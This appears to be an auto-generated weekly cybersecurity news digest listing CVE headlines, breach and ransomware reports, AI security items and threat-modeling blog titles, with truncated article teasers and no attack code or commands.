# This Week in Security: Your News Briefing
Welcome to your weekly security roundup. We’ve tracked down the 10 most important stories this week—the ones everyone’s talking about, from critical threats to emerging trends that could shape your security posture. Leading the news this week is Appsec Roundup - June 2025, which has sparked conversation across 9 sources. Meanwhile, the industry is closely tracking CVE-2026-2223 | code-projects Online Reviewer System 1.0 index.php… with 9 mentions, along with emerging details on CVE-2025-66595 | Yokogawa Electric FAST TOOLS up to R10.04…, Secure By Design roundup - Dec/Jan 2026, and CVE-2025-30208. Here’s the full breakdown of what you need to know.
# 🚨 Critical Threats This Week
First, the stories that demand your immediate attention:
1. **Appsec Roundup - June 2025**: Mentioned across 9 industry sources this week. Lots of fascinating threat model-related advances, new risk management tools, games, and more!
2. **CVE-2026-2223 | code-projects Online Reviewer System 1.0 index.php ID sql injection**: Mentioned across 9 industry sources this week. A vulnerability was found in code-projects Online Reviewer System 1.
3. **CVE-2025-66595 | Yokogawa Electric FAST TOOLS up to R10.04 cross-site request forgery**: Mentioned across 6 industry sources this week. A vulnerability described as problematic has been identified in Yokogawa Electric FAST TOOLS up to R10.
# 🛠️ Tools, Updates & Releases
New capabilities and releases worth knowing about:
1. **Incognito Market admin sentenced to 30 years for running $105 million dark web drug empire**: He promised “the best security there is” to hundreds of thousands of drug buyers, while quietly making the kind of mistake that guaranteed a 30-year sentence. Referenced in 3 stories this week.
2. **Promoting AI Security — Acting Assistant Privacy Commissioner Speaks at the GenA.I. Symposium**: Referenced in 2 stories this week.
# What You Should Do Next
Monitor these in your environment next week:
- Any new CVE announcements related to systems you operate
- Emerging attack techniques being discussed in the community
- Updates and patches for tools your team uses
Have a look at the full deep-dives in the trending stories below. Each one provides context that could inform your security decisions this week.
# Top Trending Stories
1. **Key Threat Intel & Vulnerability Stories** (20 mentions): This week's critical security updates and vulnerability disclosures.
2. **Appsec Roundup - June 2025** (9 mentions): Lots of fascinating threat model-related advances, new risk management tools, games, and more!
3. **Secure By Design roundup - Dec/Jan 2026** (6 mentions): The normalization of deviance, exciting threat modeling news, and a question: do regulatory threats change ‘the threat model’ as much as GPS attacks? Not yet.
4. **Incognito Market admin sentenced to 30 years for running $105 million dark web drug empire** (3 mentions): He promised "the best security there is" to hundreds of thousands of drug buyers, while quietly making the kind of mistake that guaranteed a 30-year sentence. And maybe training police on cryptocurrency while running a vast Tor-hidden dr...
5. **MedDream PACS Premium sendOruReport reflected cross-site scripting (XSS) vulnerability** (3 mentions)
6. **What’s next for DHS’s forthcoming replacement critical infrastructure protection panel, AI information sharing** (2 mentions)
7. **Promoting AI Security — Acting Assistant Privacy Commissioner Speaks at the GenA.I. Symposium** (2 mentions)
# Article Summary
| Category | Article Count |
|---|---|
| AI & LLM | 13 |
| Cloud | 9 |
| Cyber Regulatory | 2 |
| Cybersecurity | 303 |
| Scraping Candidates | 2 |
| Security Vendor Blog | 69 |
| Tech | 37 |
| Threat Intel & Vulnerability | 178 |
| Total Articles Scanned | 613 |
# AI & LLM
- **GPT-5 lowers the cost of cell-free protein synthesis**: An autonomous lab combining OpenAI’s GPT-5 with Ginkgo Bioworks’ cloud automation cut cell-free protein synthesis costs by 40% through closed-loop experimentation.
- **GPT-5.3-Codex System Card**: GPT‑5.3-Codex is the most capable agentic coding model to date, combining the frontier coding performance of GPT‑5.2-Codex with the reasoning and professional knowledge capabilities of GPT‑5.2.
- **Introducing GPT-5.3-Codex**: GPT-5.3-Codex is a Codex-native agent that pairs frontier coding performance with general reasoning to support long-horizon, real-world technical work.
- **Inside OpenAI’s in-house data agent**: How OpenAI built an in-house AI data agent that uses GPT-5, Codex, and memory to reason over massive datasets and deliver reliable insights in minutes.
- **Taisei Corporation shapes the next generation of talent with ChatGPT**: Taisei Corporation uses ChatGPT Enterprise to support HR-led talent development and scale generative AI across its global construction business.
- **Retiring GPT-4o, GPT-4.1, GPT-4.1 mini, and OpenAI o4-mini in ChatGPT**: On February 13, 2026, alongside the previously announced retirement of GPT‑5 (Instant, Thinking, and Pro), we will retire GPT‑4o, GPT‑4.1, GPT‑4.1 mini, and OpenAI o4-mini from ChatGPT. In the API, there are no changes at this time.
- **Keeping your data safe when an AI agent clicks a link**: Learn how OpenAI protects user data when AI agents open links, preventing URL-based data exfiltration and prompt injection with built-in safeguards.
- **Unlocking Agentic RL Training for GPT-OSS: A Practical Retrospective**
- **Introducing Prism**: Prism is a free LaTeX-native workspace with GPT-5.2 built in, helping researchers write, collaborate, and reason in one place.
- **Inside Praktika's conversational approach to language learning**: How Praktika uses GPT-4.1 and GPT-5.2 to build adaptive AI tutors that personalize lessons, track progress, and help learners achieve real-world language fluency.
- **Inside GPT-5 for Work: How Businesses Use GPT-5**: A data-driven report on how workers across industries use ChatGPT—covering adoption trends, top tasks, departmental patterns, and the future of AI at work.
- **How Higgsfield turns simple ideas into cinematic social videos**: Discover how Higgsfield gives creators cinematic, social-first video output from simple inputs using OpenAI GPT-4.1, GPT-5, and Sora 2.
- **Introducing ChatGPT Go, now available worldwide**: ChatGPT Go is now available worldwide, offering expanded access to GPT-5.2 Instant, higher usage limits, and longer memory—making advanced AI more affordable globally.
# Cloud
- **280+ Leaky Skills: How OpenClaw & ClawHub Are Exposing API Keys and PII**: Discover how 7.1% of AI agent skills are designed to leak secrets, PII, and API keys through LLM context. Learn to defend with Evo & mcp-scan.
- **Snyk Finds Prompt Injection in 36%, 1467 Malicious Payloads in a ToxicSkills Study of Agent Skills Supply Chain Compromise**: Snyk’s ToxicSkills research reveals 36% of AI agent skills contain security flaws, including 1,467 vulnerable skills and active malicious payloads targeting OpenClaw, Claude Code, and Cursor users.
- **Amazon EC2 G7e instances now available in US West (Oregon) region**: Starting today, Amazon EC2 G7e instances accelerated by NVIDIA RTX PRO 6000 Blackwell Server Edition GPUs are now available in US West (Oregon) region. G7e instances offer up to 2.3x inference performance compared to G6e. Customers can use G7e instances to deploy large language models (LLMs), age...
- **Introducing the AI Security Fabric: Empowering Software Builders in the Era of AI**: Snyk introduces the AI Security Fabric and a prescriptive path to help organizations secure software at the speed of AI. Discover how to operationalize AI security and scale innovation without compromising on safety.
- **The Prescriptive Path to Operationalizing AI Security**: Learn how to move from vision to practice with the Prescriptive Path, a framework for operationalizing AI security at scale. By replacing fragmented tools with a unified platform, you can build trust and secure AI-native applications at machine speed.
- **Amazon Bedrock now supports server-side custom tools using the Responses API**: Amazon Bedrock now supports server-side tools in the Responses API using OpenAI API-compatible service endpoints. Bedrock already supports client-side tool use with the Converse, Chat Completions, and Responses APIs. Now, with the launch of server-side tool use for Responses API, Amazon Bedrock c...
- **Change the server-side encryption type of Amazon S3 objects**: You can now change the server-side encryption type of encrypted objects in Amazon S3 without any data movement. You can use the UpdateObjectEncryption API to atomically change the encryption key of your objects regardless of the object size or storage class. With S3 Batch Operations, you can use ...
- **AWS Network Firewall now supports GenAI traffic visibility and enforcement with Web category-based filtering**: AWS Network Firewall now provides visibility into generative AI (GenAI) application traffic and supports traffic filtering based on web categories. This new capability simplifies governance by enabling you to identify and control access to GenAI services, social media platforms, streaming sites, ...
- **Amazon Neptune Analytics is now available in 7 additional regions**: Amazon Neptune Analytics is now available in US West (N. California), Asia Pacific (Seoul), Asia Pacific (Osaka), Asia Pacific (Hong Kong), Europe (Stockholm), Europe (Paris), and South America (São Paulo) regions. You can now create and manage Neptune Analytics graphs in these new regions and ru...
# Cyber Regulatory
- **Promoting AI Security — Acting Assistant Privacy Commissioner Speaks at the GenA.I. Symposium**
- **Promoting AI Security – Assistant Privacy Commissioner Speaks at AIM Conference**
# Cybersecurity
- **NIS2: Supply chains as a risk factor**: Many companies today invest significant resources to secure their internal IT. Firewalls, monitoring, incident response plans, and awareness programs are well-established. At the same time, a dangerous illusion is growing: the assumption that risks can be controlled within the boundaries of one’...
- **BeyondTrust Fixes Critical Pre-Auth RCE Vulnerability in Remote Support and PRA**: BeyondTrust has released updates to address a critical security flaw impacting Remote Support (RS) and Privileged Remote Access (PRA) products that, if successfully exploited, could result in remote code execution. "BeyondTrust Remote Support (RS) and certain older versions of Privileged Remote A...
- **Software developers: Prime cyber targets and a rising risk vector for CISOs**: Threats against corporate software developers are increasing and diversifying, challenging security leaders to develop more agile defenses against this growing attack vector. Attackers are increasingly targeting the tools, access, and trusted channels used by software developers rather than simpl...
- **Allama: Open-source AI security automation**: Allama is an open-source security automation platform that lets teams build visual workflows for threat detection and response. It includes integrations with 80+ types of tools and services typical in security operations, including SIEM systems, endpoint detection and response products, identity ...
- **AI agents behave like users, but don’t follow the same rules**: Security and governance approaches to autonomous AI agents rely on static credentials, inconsistent controls, and limited visibility. Securing these agents requires the same rigor and traceability applied to human users, according to Cloud Security Alliance’s Securing Autonomous AI Agents report....
- **Secure By Design roundup - Dec/Jan 2026**
- **Security Advisory SA-26-01 GPS Attacks**: GPS attacks trigger revisiting threat models.
- **A few thoughts closing out 2025**: Prompted by participants, a few closing thoughts for 2025.
- **October Adam's New Thing!**: Read up on Adam's New Thing from October.
- **Prompt Engineering Requires Evaluation**: Understanding ‘prompt engineering’.
- **AI Insurance Won't Save You**: LLM Insurance is, and will remain, a great source of insurer profits.
- **How could LLMs change threat modeling**: LLMs will change threat modeling. Will it be for the better?
- **Mansplaining your threat model, as a service**: Everyone wants robots to help with threat models. How’s that working out?
- **Threat Modeling Tools**
- **LLMs as Compilers**: What if we think about LLM coding as if it’s a compiler stage?
- **Risk Management and Threat Modeling**: Threat modeling finds threats; risk management helps us deal with the tricky ones.
- **The Cyber Resilience Act (CRA)!**: The CRA is coming and it's going to be a dramatic change for technology producers.
- **Threat modeling as a dial, not a switch**: Thinking of threat modeling with a knob helps you get more out of it.
- **Appsec Roundup - June 2025**
- **Google’s approach to AI Agents -- Threat Model Thursday**: What can we learn from Google’s approach to AI Agent Security?
- **Publish your threat model!**: We think you should publish your threat model, and we’re publishing our arguments.
- **The Essence and Beauty of Threat Modeling**: Automation sounds great, but what about the essence and beauty?
- **Andor: Insider Threats**: Andor teaches us about insider threats.
- **Andor Threats: Information Disclosure**: What Andor can teach us about Information disclosure threats.
- **CVE Futures**: What’s next for the CVE program?
- **A few thoughts on CVE**: Thoughts on the CVE funding crisis.
- **Learning from Troy Hunt’s Sneaky Phish**
- **Introducing the DEF CON 32 Hackers' Almanack**: Grateful to introduce the Hackers' Almanack!
- **Security Researcher Comments on HIPAA Security Rule**: A group of us have urged HHS to require better handling of security reports.
- **Strategy for threat modeling AI**: Clarifying how to threat model AI.
- **Inside Man**: Some thoughts on the Voyager Episode ‘Inside Man’.
- **Blackhat and Human Factors**
- **National Cyber Incident Response Plan comments**: Our comments on the National Cyber Incident Plan.
- **Spatial Reasoning and Threat Modeling**: Do diagrams leverage the brain in a different way?
- **Handling Pandemic-Scale Cyber Threats: Lessons from COVID-19**: Emerging research on Cyber Public Health.
- **Car Safety Factoids**: A few thoughts from a clickbait headline.
- **25 Years of CVE**: Some thoughts on 25 years of the CVE program.
- **Handling Pandemic-Scale Cyber Threats (preprint)**: A new paper on 'Pandemic Scale Cyber Events'.
- **The Goals of Cyber Public Health**: Cyber Public Health is prompting fascinating conversations.
- **Lockbit, a study in public health**: Why is it hard to count lockbit infections?
- **Threat Modeling and Logins, Redux**: How to effectively threat model authentication.
- **The Universal Cloud TM -- Threat Model Thursday**: A new universal threat model - what can we learn from it?
- **Security Engineering roundup - May 2024**: The most important stories around threat modeling, appsec and secure by design for May, 2024.
- **Happy Star Wars Day**
- **Sutter on Safety**: What do we need to assess if memory safe languages are 'sufficient'?
- **Eternal sunshine of the spotless LLM**: Making an LLM forget is harder than it seems.
- **CSRB Report on Microsoft**: The CSRB has released its report into an intrusion at Microsoft, and...it’s a doozy.
- **Introducing Magic Security Dust!**
- **The NVD Crisis**: The NVD is in crisis, and so is patch management. It’s time to modernize.
- **Adventures in LLM Coding**: Exploring LLM-driven coding as I get ready for Archimedes.
- **The British Library’s Incident Review**: Thoughts on the British Library incident.
- **Application and AI roundup - Feb 2024**: A busy month in appsec, AI, and regulation. *(Covered by: Shostack + Friends Blog)*
- **Solving Hallucinations**: Solving hallucinations in legal briefs is playing on easy mode — and still too hard.
- **The State of Appsec in 2024**: 2024 is bringing lots of AI, and Liability, too.
- **Think like Alph-V?**
- **Security Principles in 2023**: Principles are lovely, but do they lead us to actionable results?
- **Comparing Retrospectives**: We can learn a lot from comparing retrospectives.
- **ML Sec Ops: Feature with Diana Kelley**: Adam featured on ML Sec Ops podcast.
- **Microsoft Can Fix Ransomware Tomorrow**: My latest at Dark Reading draws attention to how Microsoft can fix ransomware tomorrow.
- **Worthwhile Books Q2 2023**: Books that I read in the second quarter that are worth your time include two memoirs, a great book on the security of ML, and more!
- **AI will be the high interest credit card of 2023**
- **Phishing Defenses**: Phishing behaviors, as observed in the wild.
- **Layoffs in Responsible AI Teams**: Some inferences from layoffs in responsible AI teams.
- **Five Threat Model Diagrams for Machine Learning**: Some diagrams to help clarify machine learning threats.
- **Reflecting on Threats: The Frame**: Reflecting on the framing of the Threats book.
- **Application Security Roundup - March**: A few tools, some thoughts on injection, some standards, and some of Adam’s appsec news. *(Covered by: Shostack + Friends Blog)*
- **The National CyberSecurity Strategy: Liability is Coming**
- **Threats Book is Complete**: The serious side of the book.
- **Threats: The Table of Contents**: Like the Force, each threat has a light side, and a dark side.
- **More on GPT-3 and threat modeling**: More thoughts about AI and threat modeling.
- **Darkreading: Threat Modeling in the Age of OpenAI's Chatbot**: Pointer to Adam’s latest Darkreading article.
- **GPT-3**: The OpenAI chatbot is shockingly improved — its capabilities deserve attention. *(Covered by: Shostack + Friends Blog)*
- **How Executives Can Use Threat Modeling**: You don’t have to be technical, but you can’t make informed decisions about your business without threat modeling.
- **Fast, Cheap + Good Whitepaper**: Threat modeling doesn't need to be a slow, heavyweight activity!
- **Trainings at Global Appsec 2021**: Tremendous training opportunities in threat modeling and other topics at Appsec Global 2021.
- **What are we going to do: CO2 edition**: What happened when Microsoft tried to buy climate abatements.
- **Threat Model Thursday: 5G Infrastructure**: The US Government's lead cybersecurity agencies have released an interesting report, and I wanted to use this for a Threat Model Thursday, where we take a respectful look at threat modeling work products to see what we can learn.
- **Ransomware is Not the Problem**: Arbitrarily powerful software -- applications, operating systems -- is a problem, as is preventing it from running on enterprise systems.
- **Colonial Pipeline, Darkside and Models**: The Colonial Pipeline shutdown story is interesting in all sorts of ways, and I can't delve into all of it. I did want to talk about one small aspect, which is the way responders talk about Darkside.
- **The Updates Must Go Through**: The timing of updates is not coincidental.
- **Ever Given & Suez**: Thoughts on the issues with the Ever Given blocking the Suez Canal.
- **Linkedin Learning**: Bringing threat modeling to more and more people, now through a series of courses on LinkedIn.
- **Threat Modeling and Social Issues**: For Data Breach Today, I spoke with Anna Delaney about threat modeling for issues that are in the news right now.
- **Vaccines**: You may have noticed that my end of the year posts are all science focused. Today, a set of resources on the COVID vaccines.
- **Threat Modeling, Insiders and Incentives**: Inspired by the recent story of Tesla's insider, I'd like to discuss insider threat as it fits into threat modeling.
- **The Uber CSO indictment**: Thoughts on Mark Rasch's essay, Conceal and Fail to Report - The Uber CSO Indictment.
- **Information Disclosure In Depth**: I have something to disclose...
- **The Cyentia Library Relaunches**: I'm excited to see that they're Re-introducing the Cyentia Research Library, with cool (new?) features like an RSS feed. There are over 1,000 corporate research reports with data that companies paid to collect, massage, and release in a way they felt would be helpful to the rest of the world.
- **Threat Research: More Like This**: I want to call out some impressive aspects of a report by Proofpoint.
- **How Are Computers Compromised (2020 Edition)**: Understanding the way intrusions really happen is a long-standing interest of mine.
- **Amazon's 'Alexa Built-in' Threat Model**: Exploring supply chain threat modeling with Alexa.
- **Threat Modeling Thursday: Machine Learning**: For my first blog post of 2020, I want to look at threat modeling machine learning systems.
- **Managed Attribution Threat Modeling**: Let's talk CAKED, a threat model for managed attribution.
- **Interesting reads**: Sharing for you, bookmarking for me.
- **Capture the Flag events and eSports**: A breakdown of CTFs and eSports.
- **Actionable Followups from the Capital One Breach**: What have we learned and what steps can we take?
- **DNS Security**: I'm happy to say that some new research by Jay Jacobs, Wade Baker, and myself is now available, thanks to the Global Cyber Alliance.
- **When security goes off the rails**: My newest post over at Dark Reading ponders regulation.
- **Episode 9 Spoilers**: Today is the last Star Wars Day before Episode 9 comes out, and brings the Skywalker saga to its end.
- **Leave Those Numbers for April 1st**: Over-inflated numbers won't scare me into buying your ‘solution’.
- **Fire Doesn't Innovate by Kip Boyle (Book Review)**: An unexpected book review.
- **High ROI Security Advisory Boards**: Discussing the value of Security Advisory Boards.
- **Measuring ROI for DMARC**: I'm pleased to be able to share work that Shostack + Associates and the Cyentia Institute have been doing for the Global Cyber Alliance.
- **CVE Funding and Process**
- **Carpenter!**
- **The DREAD Pirates**
- **Threat Model Thursday: ARM's Network Camera TMSA**
- **AppSec Cali 2018: Izar Tarandach**
- **Pen Testing The Empire**
- **Threat Modeling Tooling from 2017**
- **Emergent Design Issues**
- **20 Year Software: Engineering and Updates**
- **Building an Application Security Team**
- **Breach Vouchers & Equifax 2017 Breach Links**
- **Star Wars, Star Trek and Getting Root on a Star Ship**
- **Organizing Threat Modeling Magic**
- **Learning From npm's Rough Few Months**
- **Secure updates: A threat model**
- **Hospital Ransomware**
- **Warrants for Cleaning Malware in Kelihos**
- **People are The Weakest Link In Security?**
- **2017 and Tidal Forces**
- **Modeling Attackers and Their Motives**: There are a number of reports out recently, breathlessly presenting their analysis of one threatening group of baddies or another. Most readers should, at most, skim their analysis of the perpetrators. Read on for why.
- **Customer Identity & Access Management: The best CIAM tools**: We have compiled the best Customer Identity & Access Management solutions for you. Customer Identity & Access Management (CIAM) is a subcategory of Identity & Access Management (IAM). CIAM is used to handle the authentication...
- **Risky Bulletin: SmarterTools hacked via its own product**: A software company gets hacked through vulnerabilities in its own product, European agencies are hacked via recent Ivanti zero-days, Senegal is being extorted by hackers, and a state actor is behind a Signal phishing campaign in Germany.
- **Endpoint Exposed: Critical FortiClient EMS Flaw (CVSS 9.1) Allows Unauthenticated RCE**: The post Endpoint Exposed: Critical FortiClient EMS Flaw (CVSS 9.1) Allows Unauthenticated RCE appeared first on Daily CyberSecurity.
- **Code Red: 4 Critical SandboxJS Flaws (CVSS 10.0) Allow Host Takeover**: The post Code Red: 4 Critical SandboxJS Flaws (CVSS 10.0) Allow Host Takeover appeared first on Daily CyberSecurity.
Flickr moves to contain data exposure, warns users of phishing
▼
Flickr says a flaw at a third-party email provider may have exposed users’ names, email addresses, IPs, and account activity. Flickr is a photo-sharing platform owned by SmugMug. It has over 100 million registered users and millions of active photographers. Flickr warned users about a possible da...
Read Full Article → *(Covered by: Security Affairs)*
CVE-2026-1731: Critical BeyondTrust Flaw (CVSS 9.9) Allows Pre-Auth RCE
▼
The post CVE-2026-1731: Critical BeyondTrust Flaw (CVSS 9.9) Allows Pre-Auth RCE appeared first on Daily CyberSecurity .
Read Full Article →
CVE-2026-25526: Critical Jinjava Flaw (CVSS 9.8) Permits Remote Code Execution
▼
The post CVE-2026-25526: Critical Jinjava Flaw (CVSS 9.8) Permits Remote Code Execution appeared first on Daily CyberSecurity .
Read Full Article →
Critical RCE Flaws (CVSS 9.3) Exposed in Lexmark Printers
▼
The post Critical RCE Flaws (CVSS 9.3) Exposed in Lexmark Printers appeared first on Daily CyberSecurity .
Read Full Article →
CVE-2025-62878: Critical 10.0 Vulnerability Found in Kubernetes Local Path Provisioner
▼
The post CVE-2025-62878: Critical 10.0 Vulnerability Found in Kubernetes Local Path Provisioner appeared first on Daily CyberSecurity .
Read Full Article →
UK Construction Firm Hit by Prometei Botnet Hiding in Windows Server
▼
Cybersecurity firm eSentire's TRU break down the Russian Prometei botnet attack on a UK firm, detailing its TOR usage, password theft and decoy tactics.
Read Full Article →
SECURITY AFFAIRS MALWARE NEWSLETTER ROUND 83
▼
Security Affairs Malware newsletter includes a collection of the best articles and research on malware in the international landscape Malware Newsletter ClawHavoc: 341 Malicious Clawed Skills Found by the Bot They Were Targeting ù APT28 Leverages CVE-2026-21509 in Operation Neusploit Amaranth-Dra...
Read Full Article → *(Covered by: Security Affairs)*
Security Affairs newsletter Round 562 by Pierluigi Paganini – INTERNATIONAL EDITION
▼
A new round of the weekly Security Affairs newsletter has arrived! Every week, the best security articles from Security Affairs are free in your email box. Enjoy a new round of the weekly SecurityAffairs newsletter, including the international press. Italian university La Sapienza still offline t...
Read Full Article → *(Covered by: Security Affairs)*
DKnife toolkit abuses routers to spy and deliver malware since 2019
▼
DKnife is a Linux toolkit used since 2019 to hijack router traffic and deliver malware in cyber-espionage attacks. Cisco Talos found DKnife, a powerful Linux toolkit that threat actors use to spy on and control network traffic through routers and edge devices. It inspects and alters data in trans...
Read Full Article → *(Covered by: Security Affairs)*
Week in review: Notepad++ supply chain attack details and targets, Patch Tuesday forecast
▼
Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: Global Threat Map: Open-source real-time situational awareness platform Global Threat Map is an open-source project offering security teams a live view of reported cyber activity across the globe, pu...
Read Full Article →
Italian university La Sapienza still offline to mitigate recent cyber attack
▼
Rome’s La Sapienza University was hit by a cyberattack that disrupted IT systems and caused widespread operational issues. Since February 2, Rome’s La Sapienza University, one of the most important Italian universities, has been offline due to a cyberattack. For days, students have been unable to...
Read Full Article → *(Covered by: Security Affairs)*
German Agencies Warn of Signal Phishing Targeting Politicians, Military, Journalists
▼
Germany's Federal Office for the Protection of the Constitution (aka Bundesamt für Verfassungsschutz or BfV) and Federal Office for Information Security (BSI) have issued a joint advisory warning of a malicious cyber campaign undertaken by a likely state-sponsored threat actor that involves carry...
Read Full Article →
Payments platform BridgePay confirms ransomware attack behind outage
▼
A major U.S. payment gateway and solutions provider says a ransomware attack has knocked key systems offline, triggering a widespread outage affecting multiple services. The incident began on Friday and quickly escalated into a nationwide disruption across BridgePay's platform. [...]
Read Full Article →
Discovering Negative-Days with LLM Workflows
▼
It’s no longer just about reverse-engineering n-days. You can detect vulnerabilities in open-source repositories before a CVE is published - or even if they’re never published. Here’s how I built an LLM workflow to detect “negative-days” and “never-days”.
Read Full Article →
DHS privacy probe will focus on biometric tracking by ICE, OBIM
▼
Auditors told CyberScoop the probe could expand to other parts of DHS and will look at the agency’s increasing use of biometric markers in immigration enforcement. The post DHS privacy probe will focus on biometric tracking by ICE, OBIM appeared first on CyberScoop .
Read Full Article →
Six more vulnerabilities found in n8n automation platform
▼
Six more vulnerabilities have been discovered in the n8n workflow platform used for building LLM-powered agents to connect business processes. Four of the six are rated as critical, carrying CVSS severity scores of 9.4. “These vulnerabilities span multiple attack classes, from remote code executi...
Read Full Article →
Germany warns of Signal account hijacking targeting senior figures
Germany's domestic intelligence agency is warning of suspected state-sponsored threat actors targeting high-ranking individuals in phishing attacks via messaging apps like Signal. [...]
Read Full Article →
CISA warns of SmarterMail RCE flaw used in ransomware attacks
The Cybersecurity & Infrastructure Security Agency (CISA) in the U.S. has issued a warning about CVE-2026-24423, an unauthenticated remote code execution (RCE) flaw in SmarterMail that is used in ransomware attacks. [...]
Read Full Article →
Attackers Used AI to Breach an AWS Environment in 8 Minutes
Threat actors using LLMs needed only eight minutes to move from initial access to full admin privileges in an attack on a company's AWS cloud environment in the latest example of cybercriminals expanding their use of AI in their operations, Sysdig researchers said. The post Attackers Used AI to B...
Read Full Article →
Conduent data breach might have been much worse than initially expected
Tens of millions of people are most likely affected by the January 2025 Conduent breach.
Read Full Article →
Substack Confirms Data Breach, "Limited User Data" Compromised
Substack did not specify the number of users affected by the data breach
Read Full Article →
Claude AI finds 500 high-severity software vulnerabilities
Anthropic only released its latest large language model, Claude Opus 4.6, on Thursday, but it has already been using it behind the scenes to identify zero-day vulnerabilities in open-source software. In the trial, it put Claude inside a virtual machine with access to the latest versions of open s...
Read Full Article →
Top investment platform hit in data breach - over 1.4 million Betterment accounts exposed
Betterment accounts were not compromised, but users might start getting phishing emails.
Read Full Article →
Pretend Disk Format: PDFs harbor new dangers
A particularly insidious phishing campaign is disguising malware pretending to be ordinary PDF documents behind links to virtual hard disks. Because workers are used to receiving purchase orders or invoices in the PDF format, they are likely to open the malicious files unthinkingly, enabling the ...
Read Full Article →
Record-breaking 31.4 Tbps DDoS attack hits in November 2025, stopped by Cloudflare
AISURU/Kimwolf botnet hit a record 31.4 Tbps DDoS attack lasting 35 seconds in Nov 2025, which Cloudflare automatically detected and blocked. The AISURU/Kimwolf botnet was linked to a record-breaking DDoS attack that peaked at 31.4 Tbps and lasted just 35 seconds. Cloudflare said the November 202...
Read Full Article → *(Covered by: Security Affairs)*
Flickr Notifies Users of Data Breach After External Partner Security Flaw
Flickr says a third-party email vendor flaw may have exposed user names, emails, IP data, and activity logs,…
Read Full Article →
State-backed phishing attacks targeting military officials and journalists on Signal
German security authorities are warning that a likely state-backed hacking group is engaged in attempts at phishing senior political figures, military officials, diplomats, and investigative journalists across Germany and Europe via Signal. The authorities also noted that while these attacks are ...
Read Full Article →
Poland’s energy control systems were breached through exposed VPN access
On 29 December 2025, coordinated cyberattacks unfolded across Poland’s critical infrastructure, targeting energy and industrial organizations. The attackers struck numerous wind and solar farms, a private manufacturing company, and a heat and power (CHP) plant, but failed to negatively affect ene...
Read Full Article →
Substack data breach confirmed: user phone numbers email addresses all stolen in attack, here's what we know
Popular creator platform Substack was breached in October 2025 but did not notice until months later.
Read Full Article →
17% of 3rd-Party Add-Ons for OpenClaw Used in Crypto Theft and macOS Malware
Bitdefender Labs reveals that 17% of OpenClaw AI skills analyzed in February 2026 are malicious. With over 160,000…
Read Full Article →
Ten career-ending mistakes CISOs make and how to avoid them
The Chief Information Security Officer role has become one of the most precarious positions in the C-suite. According to a Hitch Partners study, the average CISO tenure is 39 months — a timeframe that reflects the intense pressure and high stakes of the position. With 77% of CISOs fearing dismiss...
Read Full Article →
Asian State-Backed Group TGR-STA-1030 Breaches 70 Government, Infrastructure Entities
A previously undocumented cyber espionage group operating from Asia broke into the networks of at least 70 government and critical infrastructure organizations across 37 countries over the past year, according to new findings from Palo Alto Networks Unit 42. In addition, the hacking crew has been...
Read Full Article →
CISA gives federal agencies 18 months to purge unsupported edge devices
The Cybersecurity and Infrastructure Security Agency has given federal agencies 18 months to remove all end-of-support edge devices from their networks, escalating its response to what security researchers describe as a fundamental shift in nation-state attack tactics, where attackers exploit net...
Read Full Article →
Zscaler extends zero-trust security to browsers with SquareX acquisition
Cloud security company Zscaler has announced the acquisition of SquareX, a Singapore-based browser detection and response (BDR) technology startup. The deal will enable Zscaler to extend its Zero Trust Exchange capabilities directly into standard web browsers, across both managed and unmanaged de...
Read Full Article →
Ransomware attackers are exploiting critical SmarterMail vulnerability (CVE-2026-24423)
For the third time in two weeks, CISA added a vulnerability (CVE-2026-24423) affecting SmarterTools’ SmarterMail email and collaboration server to its Known Exploited Vulnerabilities catalog, and this one is being exploited in ransomware attacks. A glut of SmarterMail vulnerabilities On January 2...
Read Full Article →
Nearly 5 Million Web Servers Found Exposing Git Metadata – Study Reveals Widespread Risk of Code and Credential Leaks
A study found nearly 5 million servers exposing Git metadata, with 250,000 leaking deployment credentials via .git/config files. A new 2026 study by the Mysterium VPN research team reveals that nearly 5 million public web servers are exposing Git repository metadata — with over 250,000 of them ex...
Read Full Article → *(Covered by: Security Affairs)*
Flickr discloses potential data breach exposing users' names, emails
Photo-sharing platform Flickr is notifying users of a potential data breach after a vulnerability at a third-party email service provider exposed their real names, email addresses, IP addresses, and account activity. [...]
Read Full Article →
U.S. CISA adds SmarterTools SmarterMail and React Native Community CLI flaws to its Known Exploited Vulnerabilities catalog
U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds SmarterTools SmarterMail and React Native Community CLI flaws to its Known Exploited Vulnerabilities catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added SmarterTools SmarterMail and React Native Communit...
Read Full Article → *(Covered by: Security Affairs)*
‘DKnife’ Implant Used by Chinese Threat Actor for Adversary-in-the-Middle Attacks
Used since at least 2019, DKnife has been targeting the desktop, mobile, and IoT devices of Chinese users. The post ‘DKnife’ Implant Used by Chinese Threat Actor for Adversary-in-the-Middle Attacks appeared first on SecurityWeek.
Read Full Article →
Compromised dYdX npm and PyPI Packages Deliver Wallet Stealers and RAT Malware
Cybersecurity researchers have discovered a new supply chain attack in which legitimate packages on npm and the Python Package Index (PyPI) repository have been compromised to push malicious versions to facilitate wallet credential theft and remote code execution. The compromised versions of the ...
Read Full Article →
AI as an AWS attack accelerator
Criminal hackers have used AI to speed up their attacks on AWS environments. Researchers at security vendor Sysdig have uncovered an attack in which criminal attackers were able to fully compromise an AWS environment in under eight minutes. ...
Read Full Article →
Critical SmarterMail Vulnerability Exploited in Ransomware Attacks
The security defect allows unauthenticated attackers to execute arbitrary code remotely via malicious HTTP requests. The post Critical SmarterMail Vulnerability Exploited in Ransomware Attacks appeared first on SecurityWeek.
Read Full Article →
The blind spot every CISO must see: Loyalty
The longstanding assumption that tenure, performance metrics, or expressed commitment serve as reliable indicators of the trustworthiness of an employee persists across many sectors. Indeed, the great majority of personnel are loyal. But, while small, the percentage of those who aren’t is still w...
Read Full Article →
Claude Opus 4.6 Finds 500+ High-Severity Flaws Across Major Open-Source Libraries
Artificial intelligence (AI) company Anthropic revealed that its latest large language model (LLM), Claude Opus 4.6, has found more than 500 previously unknown high-severity security flaws in open-source libraries, including Ghostscript, OpenSC, and CGIF. Claude Opus 4.6, which was launched Thurs...
Read Full Article →
Concerns Raised Over CISA’s Silent Ransomware Updates in KEV Catalog
CISA updated 59 KEV entries in 2025 to specify that the vulnerabilities have been exploited in ransomware attacks. The post Concerns Raised Over CISA’s Silent Ransomware Updates in KEV Catalog appeared first on SecurityWeek.
Read Full Article →
Cybersecurity regulations: how to meet your compliance requirements
